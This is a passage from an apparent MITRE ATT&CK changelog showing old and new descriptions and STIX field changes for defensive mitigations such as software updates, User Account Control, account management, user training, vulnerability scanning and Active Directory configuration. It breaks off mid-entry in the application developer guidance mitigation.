- OpenCTI: An open-source platform for structuring and sharing threat intelligence.
- MISP: A threat intelligence sharing platform for sharing structured threat data.
Threat Intelligence Feeds:
- Open Threat Exchange (OTX): Provides free access to a large repository of threat intelligence.
- CIRCL OSINT Feed: A free source for IOCs and threat information.
Automation and Enrichment Tools:
- TheHive: An open-source incident response platform with threat intelligence integration.
- Yeti: A platform for managing and structuring knowledge about threats.
Analysis Frameworks:
- MITRE ATT&CK Navigator: A tool for mapping threat intelligence to adversary behaviors.
- Cuckoo Sandbox: Analyzes malware to extract behavioral indicators.
Community and Collaboration Tools:
- ISAC Memberships: Join industry-specific ISACs for intelligence sharing.
- Slack/Discord Channels: Participate in threat intelligence communities for real-time collaboration. |
| x_mitre_version | 1.0 | 1.1 |
[M1051] Update Software
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Perform regular software updates to mitigate exploitation ri | t | Software updates ensure systems are protected against known |
| sk. | | vulnerabilities by applying patches and upgrades provided by |
| | | vendors. Regular updates reduce the attack surface and prev |
| | | ent adversaries from exploiting known security gaps. This in |
| | | cludes patching operating systems, applications, drivers, an |
| | | d firmware. This mitigation can be implemented through the f |
| | | ollowing measures: Regular Operating System Updates - Impl |
| | | ementation: Apply the latest Windows security updates monthl |
| | | y using WSUS (Windows Server Update Services) or a similar p |
| | | atch management solution. Configure systems to check for upd |
| | | ates automatically and schedule reboots during maintenance w |
| | | indows. - Use Case: Prevents exploitation of OS vulnerabilit |
| | | ies such as privilege escalation or remote code execution. |
| | | Application Patching - Implementation: Monitor Apache's upd |
| | | ate release notes for security patches addressing vulnerabil |
| | | ities. Schedule updates for off-peak hours to avoid downtime |
| | | while maintaining security compliance. - Use Case: Prevents |
| | | exploitation of web application vulnerabilities, such as th |
| | | ose leading to unauthorized access or data breaches. Firmwa |
| | | re Updates - Implementation: Regularly check the vendor’s w |
| | | ebsite for firmware updates addressing vulnerabilities. Plan |
| | | for update deployment during scheduled maintenance to minim |
| | | ize business disruption. - Use Case: Protects against vulner |
| | | abilities that adversaries could exploit to gain access to n |
| | | etwork devices or inject malicious traffic. Emergency Patch |
| | | Deployment - Implementation: Use the emergency patch deplo |
| | | yment feature of the organization's patch management tool to |
| | | apply updates to all affected Exchange servers within 24 ho |
| | | urs. - Use Case: Reduces the risk of exploitation by rapidly |
| | | addressing critical vulnerabilities. Centralized Patch Man |
| | | agement - Implementation: Implement a centralized patch man |
| | | agement system, such as SCCM or ManageEngine, to automate an |
| | | d track patch deployment across all environments. Generate r |
| | | egular compliance reports to ensure all systems are updated. |
| | | - Use Case: Streamlines patching processes and ensures no c |
| | | ritical systems are missed. *Tools for Implementation* Pat |
| | | ch Management Tools: - WSUS: Manage and deploy Microsoft up |
| | | dates across the organization. - ManageEngine Patch Manager |
| | | Plus: Automate patch deployment for OS and third-party apps. |
| | | - Ansible: Automate updates across multiple platforms, incl |
| | | uding Linux and Windows. Vulnerability Scanning Tools: - O |
| | | penVAS: Open-source vulnerability scanning to identify missi |
| | | ng patches. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-07-07 12:42:39.005000+00:00 | 2024-12-24 14:20:09.399000+00:00 |
| description | Perform regular software updates to mitigate exploitation risk. | Software updates ensure systems are protected against known vulnerabilities by applying patches and upgrades provided by vendors. Regular updates reduce the attack surface and prevent adversaries from exploiting known security gaps. This includes patching operating systems, applications, drivers, and firmware. This mitigation can be implemented through the following measures:
Regular Operating System Updates
- Implementation: Apply the latest Windows security updates monthly using WSUS (Windows Server Update Services) or a similar patch management solution. Configure systems to check for updates automatically and schedule reboots during maintenance windows.
- Use Case: Prevents exploitation of OS vulnerabilities such as privilege escalation or remote code execution.
Application Patching
- Implementation: Monitor Apache's update release notes for security patches addressing vulnerabilities. Schedule updates for off-peak hours to avoid downtime while maintaining security compliance.
- Use Case: Prevents exploitation of web application vulnerabilities, such as those leading to unauthorized access or data breaches.
Firmware Updates
- Implementation: Regularly check the vendor’s website for firmware updates addressing vulnerabilities. Plan for update deployment during scheduled maintenance to minimize business disruption.
- Use Case: Protects against vulnerabilities that adversaries could exploit to gain access to network devices or inject malicious traffic.
Emergency Patch Deployment
- Implementation: Use the emergency patch deployment feature of the organization's patch management tool to apply updates to all affected Exchange servers within 24 hours.
- Use Case: Reduces the risk of exploitation by rapidly addressing critical vulnerabilities.
Centralized Patch Management
- Implementation: Implement a centralized patch management system, such as SCCM or ManageEngine, to automate and track patch deployment across all environments. Generate regular compliance reports to ensure all systems are updated.
- Use Case: Streamlines patching processes and ensures no critical systems are missed.
*Tools for Implementation*
Patch Management Tools:
- WSUS: Manage and deploy Microsoft updates across the organization.
- ManageEngine Patch Manager Plus: Automate patch deployment for OS and third-party apps.
- Ansible: Automate updates across multiple platforms, including Linux and Windows.
Vulnerability Scanning Tools:
- OpenVAS: Open-source vulnerability scanning to identify missing patches. |
| x_mitre_version | 1.0 | 1.1 |
[M1052] User Account Control
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Configure Windows User Account Control to mitigate risk of a | t | User Account Control (UAC) is a security feature in Microsof |
| dversaries obtaining elevated process access. | | t Windows that prevents unauthorized changes to the operatin |
| | | g system. UAC prompts users to confirm or provide administra |
| | | tor credentials when an action requires elevated privileges. |
| | | Proper configuration of UAC reduces the risk of privilege e |
| | | scalation attacks. This mitigation can be implemented throug |
| | | h the following measures: Enable UAC Globally: - Ensure UA |
| | | C is enabled through Group Policy by setting `User Account C |
| | | ontrol: Run all administrators in Admin Approval Mode` to `E |
| | | nabled`. Require Credential Prompt: - Use Group Policy to |
| | | configure UAC to prompt for administrative credentials inste |
| | | ad of just confirmation (`User Account Control: Behavior of |
| | | the elevation prompt`). Restrict Built-in Administrator Acc |
| | | ount: Set `Admin Approval Mode` for the built-in Administra |
| | | tor account to `Enabled` in Group Policy. Secure the UAC Pr |
| | | ompt: - Configure UAC prompts to display on the secure desk |
| | | top (`User Account Control: Switch to the secure desktop whe |
| | | n prompting for elevation`). Prevent UAC Bypass: - Block u |
| | | ntrusted applications from triggering UAC prompts by configu |
| | | ring `User Account Control: Only elevate executables that ar |
| | | e signed and validated`. - Use EDR tools to detect and block |
| | | known UAC bypass techniques. Monitor UAC-Related Events: |
| | | - Use Windows Event Viewer to monitor for event ID 4688 (pro |
| | | cess creation) and look for suspicious processes attempting |
| | | to invoke UAC elevation. *Tools for Implementation* Built- |
| | | in Windows Tools: - Group Policy Editor: Configure UAC sett |
| | | ings centrally for enterprise environments. - Registry Edito |
| | | r: Modify UAC-related settings directly, such as `EnableLUA` |
| | | and `ConsentPromptBehaviorAdmin`. Endpoint Security Soluti |
| | | ons: - Microsoft Defender for Endpoint: Detects and blocks |
| | | UAC bypass techniques. - Sysmon: Logs process creations and |
| | | monitors UAC elevation attempts for suspicious activity. Th |
| | | ird-Party Security Tools: - Process Monitor (Sysinternals): |
| | | Tracks real-time processes interacting with UAC. - EventSen |
| | | try: Monitors Windows Event Logs for UAC-related alerts. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-31 13:49:49.636000+00:00 | 2024-12-24 14:26:43.340000+00:00 |
| description | Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access. | User Account Control (UAC) is a security feature in Microsoft Windows that prevents unauthorized changes to the operating system. UAC prompts users to confirm or provide administrator credentials when an action requires elevated privileges. Proper configuration of UAC reduces the risk of privilege escalation attacks. This mitigation can be implemented through the following measures:
Enable UAC Globally:
- Ensure UAC is enabled through Group Policy by setting `User Account Control: Run all administrators in Admin Approval Mode` to `Enabled`.
Require Credential Prompt:
- Use Group Policy to configure UAC to prompt for administrative credentials instead of just confirmation (`User Account Control: Behavior of the elevation prompt`).
Restrict Built-in Administrator Account:
Set `Admin Approval Mode` for the built-in Administrator account to `Enabled` in Group Policy.
Secure the UAC Prompt:
- Configure UAC prompts to display on the secure desktop (`User Account Control: Switch to the secure desktop when prompting for elevation`).
Prevent UAC Bypass:
- Block untrusted applications from triggering UAC prompts by configuring `User Account Control: Only elevate executables that are signed and validated`.
- Use EDR tools to detect and block known UAC bypass techniques.
Monitor UAC-Related Events:
- Use Windows Event Viewer to monitor for event ID 4688 (process creation) and look for suspicious processes attempting to invoke UAC elevation.
*Tools for Implementation*
Built-in Windows Tools:
- Group Policy Editor: Configure UAC settings centrally for enterprise environments.
- Registry Editor: Modify UAC-related settings directly, such as `EnableLUA` and `ConsentPromptBehaviorAdmin`.
Endpoint Security Solutions:
- Microsoft Defender for Endpoint: Detects and blocks UAC bypass techniques.
- Sysmon: Logs process creations and monitors UAC elevation attempts for suspicious activity.
Third-Party Security Tools:
- Process Monitor (Sysinternals): Tracks real-time processes interacting with UAC.
- EventSentry: Monitors Windows Event Logs for UAC-related alerts. |
| x_mitre_version | 1.1 | 1.2 |
[M1018] User Account Management
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Manage the creation, modification, use, and permissions asso | t | User Account Management involves implementing and enforcing |
| ciated to user accounts. | | policies for the lifecycle of user accounts, including creat |
| | | ion, modification, and deactivation. Proper account manageme |
| | | nt reduces the attack surface by limiting unauthorized acces |
| | | s, managing account privileges, and ensuring accounts are us |
| | | ed according to organizational policies. This mitigation can |
| | | be implemented through the following measures: Enforcing t |
| | | he Principle of Least Privilege - Implementation: Assign us |
| | | ers only the minimum permissions required to perform their j |
| | | ob functions. Regularly audit accounts to ensure no excess p |
| | | ermissions are granted. - Use Case: Reduces the risk of priv |
| | | ilege escalation by ensuring accounts cannot perform unautho |
| | | rized actions. Implementing Strong Password Policies - Imp |
| | | lementation: Enforce password complexity requirements (e.g., |
| | | length, character types). Require password expiration every |
| | | 90 days and disallow password reuse. - Use Case: Prevents a |
| | | dversaries from gaining unauthorized access through password |
| | | guessing or brute force attacks. Managing Dormant and Orph |
| | | aned Accounts - Implementation: Implement automated workflo |
| | | ws to disable accounts after a set period of inactivity (e.g |
| | | ., 30 days). Remove orphaned accounts (e.g., accounts withou |
| | | t an assigned owner) during regular account audits. - Use Ca |
| | | se: Eliminates dormant accounts that could be exploited by a |
| | | ttackers. Account Lockout Policies - Implementation: Confi |
| | | gure account lockout thresholds (e.g., lock accounts after f |
| | | ive failed login attempts). Set lockout durations to a minim |
| | | um of 15 minutes. - Use Case: Mitigates automated attack tec |
| | | hniques that rely on repeated login attempts. Multi-Factor |
| | | Authentication (MFA) for High-Risk Accounts - Implementatio |
| | | n: Require MFA for all administrative accounts and high-risk |
| | | users. Use MFA mechanisms like hardware tokens, authenticat |
| | | or apps, or biometrics. - Use Case: Prevents unauthorized ac |
| | | cess, even if credentials are stolen. Restricting Interacti |
| | | ve Logins - Implementation: Restrict interactive logins for |
| | | privileged accounts to specific secure systems or managemen |
| | | t consoles. Use group policies to enforce logon restrictions |
| | | . - Use Case: Protects sensitive accounts from misuse or exp |
| | | loitation. *Tools for Implementation* Built-in Tools: - M |
| | | icrosoft Active Directory (AD): Centralized account manageme |
| | | nt and RBAC enforcement. - Group Policy Object (GPO): Enforc |
| | | e password policies, logon restrictions, and account lockout |
| | | policies. Identity and Access Management (IAM) Tools: - O |
| | | kta: Centralized user provisioning, MFA, and SSO integration |
| | | . - Microsoft Azure Active Directory: Provides advanced acco |
| | | unt lifecycle management, role-based access, and conditional |
| | | access policies. Privileged Account Management (PAM): - Cy |
| | | berArk, BeyondTrust, Thycotic: Manage and monitor privileged |
| | | account usage, enforce session recording, and JIT access. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-20 13:49:12.270000+00:00 | 2024-12-24 14:33:36.029000+00:00 |
| description | Manage the creation, modification, use, and permissions associated to user accounts. | User Account Management involves implementing and enforcing policies for the lifecycle of user accounts, including creation, modification, and deactivation. Proper account management reduces the attack surface by limiting unauthorized access, managing account privileges, and ensuring accounts are used according to organizational policies. This mitigation can be implemented through the following measures:
Enforcing the Principle of Least Privilege
- Implementation: Assign users only the minimum permissions required to perform their job functions. Regularly audit accounts to ensure no excess permissions are granted.
- Use Case: Reduces the risk of privilege escalation by ensuring accounts cannot perform unauthorized actions.
Implementing Strong Password Policies
- Implementation: Enforce password complexity requirements (e.g., length, character types). Require password expiration every 90 days and disallow password reuse.
- Use Case: Prevents adversaries from gaining unauthorized access through password guessing or brute force attacks.
Managing Dormant and Orphaned Accounts
- Implementation: Implement automated workflows to disable accounts after a set period of inactivity (e.g., 30 days). Remove orphaned accounts (e.g., accounts without an assigned owner) during regular account audits.
- Use Case: Eliminates dormant accounts that could be exploited by attackers.
Account Lockout Policies
- Implementation: Configure account lockout thresholds (e.g., lock accounts after five failed login attempts). Set lockout durations to a minimum of 15 minutes.
- Use Case: Mitigates automated attack techniques that rely on repeated login attempts.
Multi-Factor Authentication (MFA) for High-Risk Accounts
- Implementation: Require MFA for all administrative accounts and high-risk users. Use MFA mechanisms like hardware tokens, authenticator apps, or biometrics.
- Use Case: Prevents unauthorized access, even if credentials are stolen.
Restricting Interactive Logins
- Implementation: Restrict interactive logins for privileged accounts to specific secure systems or management consoles. Use group policies to enforce logon restrictions.
- Use Case: Protects sensitive accounts from misuse or exploitation.
*Tools for Implementation*
Built-in Tools:
- Microsoft Active Directory (AD): Centralized account management and RBAC enforcement.
- Group Policy Object (GPO): Enforce password policies, logon restrictions, and account lockout policies.
Identity and Access Management (IAM) Tools:
- Okta: Centralized user provisioning, MFA, and SSO integration.
- Microsoft Azure Active Directory: Provides advanced account lifecycle management, role-based access, and conditional access policies.
Privileged Account Management (PAM):
- CyberArk, BeyondTrust, Thycotic: Manage and monitor privileged account usage, enforce session recording, and JIT access. |
| x_mitre_version | 1.1 | 1.2 |
[M1017] User Training
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Train users to be aware of access or manipulation attempts b | t | User Training involves educating employees and contractors o |
| y an adversary to reduce the risk of successful spearphishin | | n recognizing, reporting, and preventing cyber threats that |
| g, social engineering, and other techniques that involve use | | rely on human interaction, such as phishing, social engineer |
| r interaction. | | ing, and other manipulative techniques. Comprehensive traini |
| | | ng programs create a human firewall by empowering users to b |
| | | e an active component of the organization's cybersecurity de |
| | | fenses. This mitigation can be implemented through the follo |
| | | wing measures: Create Comprehensive Training Programs: - D |
| | | esign training modules tailored to the organization's risk p |
| | | rofile, covering topics such as phishing, password managemen |
| | | t, and incident reporting. - Provide role-specific training |
| | | for high-risk employees, such as helpdesk staff or executive |
| | | s. Use Simulated Exercises: - Conduct phishing simulations |
| | | to measure user susceptibility and provide targeted follow- |
| | | up training. - Run social engineering drills to evaluate emp |
| | | loyee responses and reinforce protocols. Leverage Gamificat |
| | | ion and Engagement: - Introduce interactive learning method |
| | | s such as quizzes, gamified challenges, and rewards for succ |
| | | essful detection and reporting of threats. Incorporate Secu |
| | | rity Policies into Onboarding: - Include cybersecurity trai |
| | | ning as part of the onboarding process for new employees. - |
| | | Provide easy-to-understand materials outlining acceptable us |
| | | e policies and reporting procedures. Regular Refresher Cour |
| | | ses: - Update training materials to include emerging threat |
| | | s and techniques used by adversaries. - Ensure all employees |
| | | complete periodic refresher courses to stay informed. Emph |
| | | asize Real-World Scenarios: - Use case studies of recent at |
| | | tacks to demonstrate the consequences of successful phishing |
| | | or social engineering. - Discuss how specific employee acti |
| | | ons can prevent or mitigate such attacks. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 18:55:19.798000+00:00 | 2024-12-24 14:36:46.335000+00:00 |
| description | Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction. | User Training involves educating employees and contractors on recognizing, reporting, and preventing cyber threats that rely on human interaction, such as phishing, social engineering, and other manipulative techniques. Comprehensive training programs create a human firewall by empowering users to be an active component of the organization's cybersecurity defenses. This mitigation can be implemented through the following measures:
Create Comprehensive Training Programs:
- Design training modules tailored to the organization's risk profile, covering topics such as phishing, password management, and incident reporting.
- Provide role-specific training for high-risk employees, such as helpdesk staff or executives.
Use Simulated Exercises:
- Conduct phishing simulations to measure user susceptibility and provide targeted follow-up training.
- Run social engineering drills to evaluate employee responses and reinforce protocols.
Leverage Gamification and Engagement:
- Introduce interactive learning methods such as quizzes, gamified challenges, and rewards for successful detection and reporting of threats.
Incorporate Security Policies into Onboarding:
- Include cybersecurity training as part of the onboarding process for new employees.
- Provide easy-to-understand materials outlining acceptable use policies and reporting procedures.
Regular Refresher Courses:
- Update training materials to include emerging threats and techniques used by adversaries.
- Ensure all employees complete periodic refresher courses to stay informed.
Emphasize Real-World Scenarios:
- Use case studies of recent attacks to demonstrate the consequences of successful phishing or social engineering.
- Discuss how specific employee actions can prevent or mitigate such attacks. |
| x_mitre_version | 1.2 | 1.3 |
[M1016] Vulnerability Scanning
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Vulnerability scanning is used to find potentially exploitab | t | Vulnerability scanning involves the automated or manual asse |
| le software vulnerabilities to remediate them. | | ssment of systems, applications, and networks to identify mi |
| | | sconfigurations, unpatched software, or other security weakn |
| | | esses. The process helps prioritize remediation efforts by c |
| | | lassifying vulnerabilities based on risk and impact, reducin |
| | | g the likelihood of exploitation by adversaries. This mitiga |
| | | tion can be implemented through the following measures: Pr |
| | | oactive Identification of Vulnerabilities - Implementation: |
| | | Use tools like Nessus or OpenVAS to scan endpoints, servers |
| | | , and applications for missing patches and configuration iss |
| | | ues. Schedule regular scans to ensure timely identification |
| | | of vulnerabilities introduced by new deployments or updates. |
| | | - Use Case: A scan identifies unpatched software, such as o |
| | | utdated Apache servers, which could be exploited via CVE-XXX |
| | | X-XXXX. The server is promptly patched, mitigating the risk. |
| | | Cloud Environment Scanning - Implementation: Use cloud-sp |
| | | ecific vulnerability management tools like AWS Inspector, Az |
| | | ure Security Center, or GCP Security Command Center to ident |
| | | ify issues like open S3 buckets or overly permissive IAM rol |
| | | es. - Use Case: The scan detects a misconfigured S3 bucket w |
| | | ith public read access, which is remediated to prevent poten |
| | | tial data leakage. Network Device Scanning - Implementatio |
| | | n: Use tools to scan network devices for vulnerabilities, su |
| | | ch as weak SNMP strings or outdated firmware. Correlate scan |
| | | results with vendor advisories to prioritize updates. - Use |
| | | Case: Scanning detects a router running outdated firmware v |
| | | ulnerable to CVE-XXXX-YYYY. The firmware is updated to a sec |
| | | ure version. Web Application Scanning - Implementation: Us |
| | | e dynamic application security testing (DAST) tools such as |
| | | OWASP ZAP or Burp Suite to scan for common vulnerabilities l |
| | | ike SQL injection or cross-site scripting (XSS). Perform reg |
| | | ular scans post-deployment to identify newly introduced vuln |
| | | erabilities. - Use Case: A scan identifies a cross-site scri |
| | | pting vulnerability in a form input field, which is promptly |
| | | remediated by developers. Prioritizing Vulnerabilities - |
| | | Implementation: Use vulnerability scoring frameworks like CV |
| | | SS to assess severity. Integrate vulnerability scanning tool |
| | | s with ticketing systems to assign remediation tasks based o |
| | | n criticality. - Use Case: A critical vulnerability with a C |
| | | VSS score of 9.8 affecting remote access servers is prioriti |
| | | zed and patched first. *Tools for Implementation* Open Sou |
| | | rce Tools: - OpenVAS: Comprehensive network and system vuln |
| | | erability scanning. - OWASP ZAP: Dynamic scanning of web app |
| | | lications for vulnerabilities. - Nmap with NSE Scripts: Netw |
| | | ork scanning with scripts to detect vulnerabilities. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-07-14 22:22:06.356000+00:00 | 2024-12-24 14:41:01.585000+00:00 |
| description | Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them. | Vulnerability scanning involves the automated or manual assessment of systems, applications, and networks to identify misconfigurations, unpatched software, or other security weaknesses. The process helps prioritize remediation efforts by classifying vulnerabilities based on risk and impact, reducing the likelihood of exploitation by adversaries. This mitigation can be implemented through the following measures:
Proactive Identification of Vulnerabilities
- Implementation: Use tools like Nessus or OpenVAS to scan endpoints, servers, and applications for missing patches and configuration issues. Schedule regular scans to ensure timely identification of vulnerabilities introduced by new deployments or updates.
- Use Case: A scan identifies unpatched software, such as outdated Apache servers, which could be exploited via CVE-XXXX-XXXX. The server is promptly patched, mitigating the risk.
Cloud Environment Scanning
- Implementation: Use cloud-specific vulnerability management tools like AWS Inspector, Azure Security Center, or GCP Security Command Center to identify issues like open S3 buckets or overly permissive IAM roles.
- Use Case: The scan detects a misconfigured S3 bucket with public read access, which is remediated to prevent potential data leakage.
Network Device Scanning
- Implementation: Use tools to scan network devices for vulnerabilities, such as weak SNMP strings or outdated firmware. Correlate scan results with vendor advisories to prioritize updates.
- Use Case: Scanning detects a router running outdated firmware vulnerable to CVE-XXXX-YYYY. The firmware is updated to a secure version.
Web Application Scanning
- Implementation: Use dynamic application security testing (DAST) tools such as OWASP ZAP or Burp Suite to scan for common vulnerabilities like SQL injection or cross-site scripting (XSS). Perform regular scans post-deployment to identify newly introduced vulnerabilities.
- Use Case: A scan identifies a cross-site scripting vulnerability in a form input field, which is promptly remediated by developers.
Prioritizing Vulnerabilities
- Implementation: Use vulnerability scoring frameworks like CVSS to assess severity.
Integrate vulnerability scanning tools with ticketing systems to assign remediation tasks based on criticality.
- Use Case: A critical vulnerability with a CVSS score of 9.8 affecting remote access servers is prioritized and patched first.
*Tools for Implementation*
Open Source Tools:
- OpenVAS: Comprehensive network and system vulnerability scanning.
- OWASP ZAP: Dynamic scanning of web applications for vulnerabilities.
- Nmap with NSE Scripts: Network scanning with scripts to detect vulnerabilities. |
| x_mitre_version | 1.1 | 1.2 |
Patches
[M1015] Active Directory Configuration
Current version: 1.2
|
|
|---|
| t | Implement robust Active Directory configurations using group | t | Implement robust Active Directory (AD) configurations using |
| policies to control access and reduce the attack surface. S | | group policies to secure user accounts, control access, and |
| pecific examples include: * Account Configuration: Use prov | | minimize the attack surface. AD configurations enable centra |
| isioned domain accounts rather than local accounts to levera | | lized control over account settings, logon policies, and per |
| ge centralized control and auditing capabilities. * Interact | | missions, reducing the risk of unauthorized access and later |
| ive Logon Restrictions: Enforce group policies that prohibit | | al movement within the network. This mitigation can be imple |
| interactive logons for accounts that should not directly ac | | mented through the following measures: Account Configuratio |
| cess systems. * Remote Desktop Settings: Limit Remote Deskto | | n: - Implementation: Use domain accounts instead of local a |
| p logons to authorized accounts to prevent misuse by adversa | | ccounts to leverage AD’s centralized management, including g |
| ries. * Dedicated Administrative Accounts: Create specialize | | roup policies, auditing, and access control. - Use Case: For |
| d domain-wide accounts that are restricted from interactive | | IT staff managing shared resources, provision domain accoun |
| logons but can perform specific tasks like installations or | | ts that allow IT teams to log in centrally, reducing the ris |
| repository access. * Authentication Silos: Configure Authent | | k of unmanaged, rogue local accounts on individual machines. |
| ication Silos in Active Directory to create access zones wit | | Interactive Logon Restrictions: - Implementation: Configu |
| h restrictions based on membership in the Protected Users gl | | re group policies to restrict interactive logons (e.g., dire |
| obal security group. This setup enhances security by applyin | | ct physical or RDP logons) for service accounts or privilege |
| g additional protections to high-risk accounts, limiting the | | d accounts that do not require such access. - Use Case: Prev |
| ir exposure to potential attacks. | | ent service accounts, such as SQL Server accounts, from havi |
| | | ng interactive logon privileges. This reduces the risk of th |
| | | ese accounts being leveraged for lateral movement if comprom |
| | | ised. Remote Desktop Settings: - Implementation: Limit Rem |
| | | ote Desktop Protocol (RDP) access to specific, authorized ac |
| | | counts. Use group policies to enforce this, allowing only ne |
| | | cessary users to establish RDP sessions. - Use Case: On sens |
| | | itive servers (e.g., domain controllers or financial databas |
| | | es), restrict RDP access to administrative accounts only, wh |
| | | ile all other users are denied access. Dedicated Administra |
| | | tive Accounts: - Implementation: Create domain-wide adminis |
| | | trative accounts that are restricted from interactive logons |
| | | , designed solely for high-level tasks (e.g., software insta |
| | | llation, patching). - Use Case: Create separate administrati |
| | | ve accounts for different purposes, such as one set of accou |
| | | nts for installations and another for managing repository ac |
| | | cess. This limits exposure and helps reduce attack vectors. |
| | | Authentication Silos: - Implementation: Configure Authenti |
| | | cation Silos in AD, using group policies to create access zo |
| | | nes with restrictions based on membership, such as the Prote |
| | | cted Users security group. This restricts access to critical |
| | | accounts and minimizes exposure to potential threats. - Use |
| | | Case: Place high-risk or high-value accounts, such as execu |
| | | tive or administrative accounts, in an Authentication Silo w |
| | | ith extra controls, limiting their exposure to only necessar |
| | | y systems. This reduces the risk of credential misuse or abu |
| | | se if these accounts are compromised. **Tools for Implement |
| | | ation**: - Active Directory Group Policies: Use Group Polic |
| | | y Management Console (GPMC) to configure, deploy, and enforc |
| | | e policies across AD environments. - PowerShell: Automate ac |
| | | count configuration, logon restrictions, and policy applicat |
| | | ion using PowerShell scripts. - AD Administrative Center: Ma |
| | | nage Authentication Silos and configure high-level policies |
| | | for critical user groups within AD. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-08 17:01:33.131000+00:00 | 2024-12-10 15:57:59.336000+00:00 |
| description | Implement robust Active Directory configurations using group policies to control access and reduce the attack surface. Specific examples include:
* Account Configuration: Use provisioned domain accounts rather than local accounts to leverage centralized control and auditing capabilities.
* Interactive Logon Restrictions: Enforce group policies that prohibit interactive logons for accounts that should not directly access systems.
* Remote Desktop Settings: Limit Remote Desktop logons to authorized accounts to prevent misuse by adversaries.
* Dedicated Administrative Accounts: Create specialized domain-wide accounts that are restricted from interactive logons but can perform specific tasks like installations or repository access.
* Authentication Silos: Configure Authentication Silos in Active Directory to create access zones with restrictions based on membership in the Protected Users global security group. This setup enhances security by applying additional protections to high-risk accounts, limiting their exposure to potential attacks. | Implement robust Active Directory (AD) configurations using group policies to secure user accounts, control access, and minimize the attack surface. AD configurations enable centralized control over account settings, logon policies, and permissions, reducing the risk of unauthorized access and lateral movement within the network. This mitigation can be implemented through the following measures:
Account Configuration:
- Implementation: Use domain accounts instead of local accounts to leverage AD’s centralized management, including group policies, auditing, and access control.
- Use Case: For IT staff managing shared resources, provision domain accounts that allow IT teams to log in centrally, reducing the risk of unmanaged, rogue local accounts on individual machines.
Interactive Logon Restrictions:
- Implementation: Configure group policies to restrict interactive logons (e.g., direct physical or RDP logons) for service accounts or privileged accounts that do not require such access.
- Use Case: Prevent service accounts, such as SQL Server accounts, from having interactive logon privileges. This reduces the risk of these accounts being leveraged for lateral movement if compromised.
Remote Desktop Settings:
- Implementation: Limit Remote Desktop Protocol (RDP) access to specific, authorized accounts. Use group policies to enforce this, allowing only necessary users to establish RDP sessions.
- Use Case: On sensitive servers (e.g., domain controllers or financial databases), restrict RDP access to administrative accounts only, while all other users are denied access.
Dedicated Administrative Accounts:
- Implementation: Create domain-wide administrative accounts that are restricted from interactive logons, designed solely for high-level tasks (e.g., software installation, patching).
- Use Case: Create separate administrative accounts for different purposes, such as one set of accounts for installations and another for managing repository access. This limits exposure and helps reduce attack vectors.
Authentication Silos:
- Implementation: Configure Authentication Silos in AD, using group policies to create access zones with restrictions based on membership, such as the Protected Users security group. This restricts access to critical accounts and minimizes exposure to potential threats.
- Use Case: Place high-risk or high-value accounts, such as executive or administrative accounts, in an Authentication Silo with extra controls, limiting their exposure to only necessary systems. This reduces the risk of credential misuse or abuse if these accounts are compromised.
**Tools for Implementation**:
- Active Directory Group Policies: Use Group Policy Management Console (GPMC) to configure, deploy, and enforce policies across AD environments.
- PowerShell: Automate account configuration, logon restrictions, and policy application using PowerShell scripts.
- AD Administrative Center: Manage Authentication Silos and configure high-level policies for critical user groups within AD. |
mobile-attack
Minor Version Changes
[M1013] Application Developer Guidance
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | This mitigation describes any guidance or training given to | t | Application Developer Guidance focuses on providing develope |
| developers of applications to avoid introducing security wea | | rs with the knowledge, tools, and best practices needed to w |
| knesses that an adversary may be able to take advantage of. | | rite secure code, reduce vulnerabilities, and implement secu |
| | | re design principles. By integrating security throughout the |
| | | software development lifecycle (SDLC), this mitigation aims |
| | | to prevent the introduction of exploitable weaknesses in ap |
| | | plications, systems, and APIs. This mitigation can be implem |
| | | ented through the following measures: Preventing SQL Injec |
| | | tion (Secure Coding Practice): - Implementation: Train deve |
| | | lopers to use parameterized queries or prepared statements i |
| | | nstead of directly embedding user input into SQL queries. - |
| | | Use Case: A web application accepts user input to search a d |
| | | atabase. By sanitizing and validating user inputs, developer |
| | | s can prevent attackers from injecting malicious SQL command |
| | | s. Cross-Site Scripting (XSS) Mitigation: - Implementation |
| | | : Require developers to implement output encoding for all us |
| | | er-generated content displayed on a web page. - Use Case: An |
| | | e-commerce site allows users to leave product reviews. Prop |
| | | erly encoding and escaping user inputs prevents malicious sc |
| | | ripts from being executed in other users’ browsers. Secure |
| | | API Design: - Implementation: Train developers to authentic |
| | | ate all API endpoints and avoid exposing sensitive informati |
| | | on in API responses. - Use Case: A mobile banking applicatio |
| | | n uses APIs for account management. By enforcing token-based |
| | | authentication for every API call, developers reduce the ri |
| | | sk of unauthorized access. Static Code Analysis in the Buil |
| | | d Pipeline: - Implementation: Incorporate tools into CI/CD |
| | | pipelines to automatically scan for vulnerabilities during t |
| | | he build process. - Use Case: A fintech company integrates s |
| | | tatic analysis tools to detect hardcoded credentials in thei |
| | | r source code before deployment. Threat Modeling in the Des |
| | | ign Phase: - Implementation: Use frameworks like STRIDE (Sp |
| | | oofing, Tampering, Repudiation, Information Disclosure, Deni |
| | | al of Service, Elevation of Privilege) to assess threats dur |
